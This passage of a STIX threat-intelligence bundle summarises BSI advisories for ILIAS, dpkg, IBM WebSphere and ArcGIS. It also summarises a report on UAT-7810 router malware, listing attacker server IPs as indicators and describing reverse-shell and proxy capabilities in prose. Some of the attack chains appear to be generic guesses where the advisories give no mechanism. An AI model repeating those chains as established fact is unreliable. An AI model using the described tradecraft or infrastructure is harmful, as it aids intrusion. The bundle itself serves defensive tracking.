      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94c390a9-bcb2-5e9f-9327-8fa391061804",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a7f96af4-e326-59bf-a437-c5d180830a3c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a7f96af4-e326-59bf-a437-c5d180830a3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ILIAS: Multiple Vulnerabilities Identified by BSI",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued a security advisory (WID-SEC-2026-2230) detailing multiple vulnerabilities present in the ILIAS e-learning and collaboration platform. These flaws allow an attacker to circumvent security mechanisms, facilitate the unauthorized disclosure of sensitive data, and conduct Cross-Site Scripting (XSS) attacks. While the advisory does not specify particular versions, the presence of these weaknesses could lead to significant security compromises for organizations utilizing ILIAS. The potential impact includes unauthorized access to user accounts or data, compromise of sensitive information stored within the platform, and client-side code execution in users' browsers, enabling further malicious activities. Organizations are urged to review their ILIAS deployments and apply necessary updates to mitigate these risks effectively and prevent potential exploitation.\n\n## Impact\n\nThe identified vulnerabilities in ILIAS could result in significant damage if exploited. Attackers could bypass existing security controls, gaining unauthorized access to the platform's functionalities or user data. The potential for sensitive information disclosure means critical data, such as personal user details, educational records, or confidential project information, could be exfiltrated. Furthermore, Cross-Site Scripting attacks enable client-side code execution, allowing attackers to hijack user sessions, deface web pages, or redirect users to malicious sites. While no specific victim count or targeted sectors were mentioned, any organization relying on ILIAS for learning or collaboration is at risk of data breach, reputation damage, and operational disruption.\n\n## Recommendation\n\n* Apply the latest security patches and updates provided by the ILIAS project for your deployed versions to address the identified vulnerabilities.\n* Regularly monitor security advisories from ILIAS and reputable sources like the BSI regarding the ILIAS platform to stay informed about new vulnerabilities and required patches.\n",
      "published": "2026-07-08T08:33:19Z",
      "labels": [
        "web-application",
        "vulnerability",
        "xss",
        "information-disclosure",
        "ilias"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2230"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Cloud Storage",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4654d44c-daf7-5e65-bb09-dbfd9d50a86b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b85ca78b-db1d-53db-bedf-0345b13feea8",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b85ca78b-db1d-53db-bedf-0345b13feea8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "dpkg: Vulnerability Enables Information Disclosure",
      "description": "## Overview\n\nA significant security vulnerability has been identified within `dpkg`, the core package management system for Debian-based Linux distributions. This flaw allows a remote and anonymous attacker to exploit the system, leading to unauthorized information disclosure. While the specific mechanism of exploitation is not detailed, the consequence is the potential exposure of sensitive data or internal system configurations. This vulnerability is critical for organizations relying on Debian or Ubuntu systems, as it could provide adversaries with reconnaissance data to facilitate further attacks or directly compromise data privacy. Defenders should prioritize patching `dpkg` to mitigate the risk posed by this unauthenticated information leak.\n\n## Attack Chain\n\n1. An unauthenticated remote attacker identifies a vulnerable `dpkg` instance on a Debian-based system.\n2. The attacker crafts a malicious request or input targeting the identified vulnerability in the `dpkg` component.\n3. This malicious input triggers the information disclosure vulnerability within `dpkg`'s parsing or processing logic.\n4. The `dpkg` system inadvertently provides access to sensitive system information or configuration details to the attacker.\n5. The attacker collects the disclosed information, which could include system paths, user configurations, or other data deemed sensitive by the system.\n6. The objective of the attack is achieved through the unauthorized acquisition of system intelligence, enabling further reconnaissance or targeted exploitation.\n\n## Impact\n\nThe successful exploitation of this vulnerability directly leads to unauthorized information disclosure. While not immediately leading to system compromise or data modification, the leaked information can provide critical intelligence to attackers. This could include system configurations, internal network details, sensitive file paths, or potentially even snippets of user data, depending on the nature of the information accessible via `dpkg`. Such data serves as valuable reconnaissance for future, more severe attacks, making systems more vulnerable to privilege escalation, data exfiltration, or complete takeover. Organizations running vulnerable Debian-based systems could face significant compliance and data privacy risks.\n\n## Recommendation\n\n* Prioritize patching `dpkg` on all affected Debian-based systems immediately to address the identified vulnerability.\n* Regularly review system logs for unusual `dpkg` activity, especially related to package queries or manipulations, which might indicate exploitation attempts.\n",
      "published": "2026-07-08T08:34:03Z",
      "labels": [
        "information-disclosure",
        "linux",
        "package-manager",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-1445"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed39890b-6cc9-52eb-8b81-cfcbe9a24397",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--36e17c0d-dbd6-536d-9e00-a63c607e079c",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--36e17c0d-dbd6-536d-9e00-a63c607e079c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "IBM WebSphere Application Server Liberty Denial of Service Vulnerability",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has reported a vulnerability in IBM WebSphere Application Server Liberty that could lead to a Denial of Service (DoS) condition. This flaw allows an unauthenticated, remote attacker to disrupt the availability of the affected application server. While specific exploitation details are not disclosed in the brief, the potential for service disruption poses a significant concern for organizations relying on WebSphere Liberty for critical applications. The ability for an anonymous attacker to trigger this DoS without authentication means that systems exposed to the internet are particularly at risk, highlighting the importance of timely patching. This vulnerability, if exploited, could lead to severe operational impacts and loss of access to services.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies an exposed IBM WebSphere Application Server Liberty instance.\n2. The attacker crafts and sends a specially malformed request to the vulnerable service endpoint.\n3. The vulnerable component in WebSphere Application Server Liberty processes the malformed request.\n4. The server's resources (e.g., CPU, memory, network connections) become exhausted or the service crashes.\n5. Legitimate users are unable to access the application server, resulting in a Denial of Service.\n6. The application server remains unavailable until manually restarted or the vulnerability is mitigated.\n\n## Impact\n\nA successful Denial of Service attack against IBM WebSphere Application Server Liberty can lead to significant operational disruption for organizations. This could include loss of access to critical business applications, interruption of online services, and potential financial losses due to downtime. The absence of specific victim counts or targeted sectors in this brief suggests the vulnerability is newly reported, but any organization utilizing this product should consider the potential for service unavailability as a serious consequence, impacting continuity and potentially brand reputation.\n\n## Recommendation\n\n* Apply available security patches and updates for IBM WebSphere Application Server Liberty as soon as they are released by the vendor to address the reported vulnerability.\n* Implement robust monitoring for the affected IBM WebSphere Application Server Liberty product to detect unusual resource utilization (CPU, memory, network I/O) or unexpected service stoppages.\n* Ensure proper network segmentation and access controls are in place to limit exposure of IBM WebSphere Application Server Liberty instances to untrusted networks.\n",
      "published": "2026-07-08T09:08:14Z",
      "labels": [
        "denial-of-service",
        "application-server",
        "vulnerability",
        "ibm"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2233"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d064e939-5d37-5cef-b272-ee60cf01cdf2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3f77e241-4a5e-5b83-ae97-a79cfb49eea6",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3f77e241-4a5e-5b83-ae97-a79cfb49eea6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "IBM WebSphere Application Server: Authenticated Remote Action Execution Vulnerability",
      "description": "## Overview\n\nA significant vulnerability has been identified in IBM WebSphere Application Server, enabling a remote, authenticated attacker to execute arbitrary actions on the underlying server. This flaw, detailed by BSI (Bundesamt für Sicherheit in der Informationstechnik), could lead to severe system compromise, data manipulation, or further unauthorized access within an affected environment. Although specific versions or direct exploitation campaigns are not yet detailed, the nature of the vulnerability suggests that any authenticated attacker gaining access to the WebSphere interface could leverage this to elevate privileges or execute malicious code. Defenders should prioritize patching this vulnerability to prevent potential server compromise and maintain system integrity.\n\n## Attack Chain\n\n1. Attacker gains authenticated access to the IBM WebSphere Application Server through legitimate or compromised credentials.\n2. The attacker identifies and leverages an unspecified vulnerability within their authenticated session.\n3. This vulnerability allows the attacker to bypass normal application controls and inject malicious input.\n4. The attacker crafts and injects commands or code designed to perform arbitrary actions on the server.\n5. The IBM WebSphere Application Server processes and executes these injected commands or code due to the underlying flaw.\n6. Successful execution grants the attacker the ability to perform various actions on the underlying host system, such as data exfiltration, service disruption, or further system compromise.\n\n## Impact\n\nThe successful exploitation of this vulnerability would allow an attacker to execute arbitrary actions on the server hosting IBM WebSphere Application Server. This can lead to a complete compromise of the affected server, enabling data theft, modification, or destruction, and potentially providing a pivot point for further lateral movement within the network. While no specific victim count or targeted sectors have been reported, organizations utilizing IBM WebSphere Application Server are at risk, and the impact could range from service disruption to critical data breaches.\n\n## Recommendation\n\n* Apply the latest security updates from IBM for WebSphere Application Server immediately to address this vulnerability.\n* Review access logs for suspicious authenticated activity on WebSphere Application Server instances, including unusual command execution patterns or privilege escalation attempts.\n* Implement strong authentication mechanisms and least privilege principles for all accounts accessing WebSphere Application Server.\n",
      "published": "2026-07-08T09:08:57Z",
      "labels": [
        "websphere",
        "vulnerability",
        "rce",
        "ibm",
        "server",
        "authenticated-access"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2232"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1a80512e-6d9c-5d74-ae4d-18ac44995eaa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--322c3c11-763d-5420-961c-66d74365adb1",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8542f4e-61eb-5810-98f0-3aead94cdb17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--322c3c11-763d-5420-961c-66d74365adb1",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8527448-aafa-5138-be20-324756c9a38c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--322c3c11-763d-5420-961c-66d74365adb1",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--322c3c11-763d-5420-961c-66d74365adb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in ESRI ArcGIS Allow Privilege Escalation and Security Bypass",
      "description": "## Overview\n\nA recent security advisory from the German Federal Office for Information Security (BSI) highlights multiple critical vulnerabilities affecting ESRI ArcGIS products. These vulnerabilities, which currently lack specific public identifiers like CVEs, could be exploited by a remote and anonymous attacker. The exploitation of these flaws allows an adversary to bypass existing security mechanisms within the ArcGIS environment or escalate their privileges to obtain higher user rights. This advisory emphasizes the potential for unauthorized access and control over sensitive geospatial data and infrastructure managed by ArcGIS. Organizations leveraging ESRI ArcGIS are urged to address these issues promptly, as the unspecified nature of the vulnerabilities suggests broad applicability and potentially severe consequences if left unpatched.\n\n## Attack Chain\n\n1. A remote, anonymous attacker identifies an internet-exposed or internally accessible ESRI ArcGIS instance.\n2. The attacker researches and identifies one or more unpatched vulnerabilities within the ArcGIS software.\n3. The attacker crafts and sends malicious requests or input to the vulnerable ESRI ArcGIS application via the network.\n4. Successful exploitation of the initial vulnerability allows the attacker to bypass authentication or other security controls.\n5. The attacker establishes an initial unauthorized foothold or obtains limited access to the ArcGIS system.\n6. Further exploitation of a privilege escalation vulnerability grants the attacker elevated user rights within the application or underlying system.\n7. With elevated privileges, the attacker can then access, modify, or exfiltrate sensitive data.\n8. The attacker achieves persistent unauthorized control over the compromised ESRI ArcGIS instance and its associated resources.\n\n## Impact\n\nThe exploitation of these vulnerabilities in ESRI ArcGIS could lead to significant operational disruption and data compromise for affected organizations across various sectors, particularly those reliant on geospatial intelligence and mapping services. If an attacker successfully bypasses security measures and gains elevated user rights, they could obtain full control over the ArcGIS system, manipulate critical geographic data, or access confidential information. The lack of specific details regarding the vulnerabilities implies a broad potential attack surface, making all unpatched ArcGIS installations susceptible to unauthorized access, data integrity issues, and potential exfiltration of proprietary or sensitive mapping data.\n\n## Recommendation\n\n* Apply the latest security patches and updates provided by ESRI for all affected ArcGIS products as soon as they become available.\n* Review network segmentation and access controls for all ESRI ArcGIS deployments, limiting access to trusted sources and necessary ports.\n* Ensure proper logging and monitoring are enabled for ESRI ArcGIS applications to detect unusual activity that could indicate exploitation attempts.\n",
      "published": "2026-07-08T09:15:46Z",
      "labels": [
        "vulnerability",
        "esri",
        "arcgis",
        "privilege-escalation",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2237"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--14aa045b-6453-56a8-9b63-0ff6e939fa33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 194.233.92.26",
      "pattern": "[ipv4-addr:value = '194.233.92.26']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91d05443-7278-58f7-9d1e-d228a1f18dd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--14aa045b-6453-56a8-9b63-0ff6e939fa33"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bbc3faf2-a884-5590-87a9-c9755b8af32f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 217.15.160.247",
      "pattern": "[ipv4-addr:value = '217.15.160.247']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d749520-d315-5487-98d2-de3794c99308",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--bbc3faf2-a884-5590-87a9-c9755b8af32f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4b0505c6-386f-5bd6-9051-0cb30eb558db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 217.15.164.147",
      "pattern": "[ipv4-addr:value = '217.15.164.147']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--335e8a00-4f58-5205-a0ca-b4a6f4687279",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--4b0505c6-386f-5bd6-9051-0cb30eb558db"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0610da4e-becb-51b2-84af-8257bcdb46bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 95.182.100.231",
      "pattern": "[ipv4-addr:value = '95.182.100.231']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5b6cbdd-ba41-5618-9250-de4689e91e38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--0610da4e-becb-51b2-84af-8257bcdb46bb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d5e14fb-e9a2-5260-b4bb-e5be8b2f0dd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--49fe2c1a-ef3e-527c-bf52-ca4a6d283b91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a36db515-25db-5837-b17f-62604fe476cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--67e5a3f3-bdab-5849-96ea-4884342a9dc0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36132596-b876-536e-97ac-9a0531c57cc7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1102",
          "url": "https://attack.mitre.org/techniques/T1102"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--398c9635-7513-5bf1-be23-6de35a5f5cfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53d4d221-5486-5fb0-94a3-c9e83efe5e08",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--87222231-1282-5883-8159-e848a7d65fb6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "UAT-7810"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c609280d-189a-5bb3-8626-90b60f19b866",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "threat-actor--87222231-1282-5883-8159-e848a7d65fb6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "UAT-7810 Expands ORB Networks with New Custom Malware: LONGLEASH, DOGLEASH, and JARLEASH",
      "description": "## Overview\n\nCisco Talos has identified that the China-nexus APT actor UAT-7810 continues to evolve its custom malware arsenal and expand its LapDogs Operational Relay Box (ORB) network. Since 2025, UAT-7810 has been observed exploiting N-day vulnerabilities in unpatched Ruckus wireless routers and, more recently in early 2026, ASUS AiCloud routers, to establish persistent footholds. The group has developed new malware families, including LONGLEASH (an advanced version of SHORTLEASH), DOGLEASH (a C-based backdoor for Linux devices), and JARLEASH (a JAVA-based backdoor). These tools enable UAT-7810 to establish robust command and control, proxy traffic, and create a resilient ORB network. This network is then leveraged by secondary China-nexus APT actors, such as UAT-5918, to conduct their own malicious operations against high-value targets, making the affected devices critical infrastructure for broader APT campaigns.\n\n## Attack Chain\n\n1.  **Initial Access**: UAT-7810 exploits known N-day vulnerabilities (CVE-2020-22653, CVE-2020-22658, CVE-2023-25717, CVE-2025-2492) in unpatched Ruckus wireless routers and ASUS AiCloud routers to gain unauthorized access.\n2.  **Execution/Payload Delivery**: A shell script is deployed to the compromised router, acting as an initial dropper or loader.\n3.  **Malware Download**: The shell script downloads secondary malware payloads, such as DOGLEASH, LONGLEASH, or JARLEASH, from attacker-controlled servers (e.g., 194.233.92[.]26, 217.15.160[.]247, 217.15.164[.]147, 95.182.100[.]231).\n4.  **Persistence/Network Configuration**: The shell script adds `iptables` rules to the compromised Linux-based device, allowing TCP traffic to a specific hardcoded port where DOGLEASH binds and listens for commands.\n5.  **Execution**: DOGLEASH (a C-based ELF binary) is executed on the device, binding to its designated port. LONGLEASH (MIPS, ARM, x64 variants) or JARLEASH (JAVA-based) are also executed depending on the target architecture and operational needs.\n6.  **Command and Control (C2)**: DOGLEASH listens for incoming TCP data, decodes it, and executes arbitrary shellcode. LONGLEASH, named \"ff-agent\" internally, establishes reverse shells, HTTP, DNS, SOCKS, TCP, ICMP, and UDP proxy servers, and can act as an intermediate C2 server, forwarding commands. JARLEASH provides file management, FTP, SFTP, and Netcat capabilities.\n7.  **Network Establishment**: The compromised router becomes part of the LapDogs Operational Relay Box (ORB) network, providing resilient and covert infrastructure for command and control.\n8.  **Impact Operations**: The established ORB network is subsequently leveraged by associated secondary threat actors to conduct their own malicious attacks, potentially involving data exfiltration, further lateral movement, or other objectives against high-value targets.\n\n## Impact\n\nThe primary impact of UAT-7810's activities is the establishment and expansion of the LapDogs Operational Relay Box (ORB) network, which serves as critical infrastructure for other China-nexus APTs. Compromised routers, specifically Ruckus wireless and ASUS AiCloud devices, are transformed into C2 nodes and traffic relays, providing anonymity and resilience for subsequent attacks. This infrastructure facilitates a wide range of malicious operations against high-value targets, including government entities, critical infrastructure, and other sensitive organizations, potentially leading to widespread data 